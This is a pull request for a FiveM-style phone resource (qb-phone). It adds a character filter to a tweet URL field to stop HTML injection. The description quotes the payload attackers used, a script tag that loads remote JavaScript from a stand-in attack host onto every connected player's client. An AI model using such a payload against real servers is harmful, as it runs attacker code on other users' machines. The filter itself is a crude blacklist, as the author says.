### PR TITLE
A dirty fix to prevent HTML injection

### DIFF
--- a/server/main.lua
+++ b/server/main.lua
@@ -968,7 +968,7 @@ RegisterNetEvent('qb-phone:server:UpdateTweets', function(NewTweets, TweetData)
 	TweetData.lastName,
 	TweetData.message,
 	TweetData.date,
-	TweetData.url,
+	TweetData.url:gsub("[%<>\"()\' $]",""),
 	TweetData.picture,
 	TweetData.tweetId
 	})


### PR DESCRIPTION
People using ""><script>$.getScript('attacksite.com/exploit.js');</script> to load a malicious Javascript file onto everyone's client. Everyone in the server who has a phone runs the malicious script.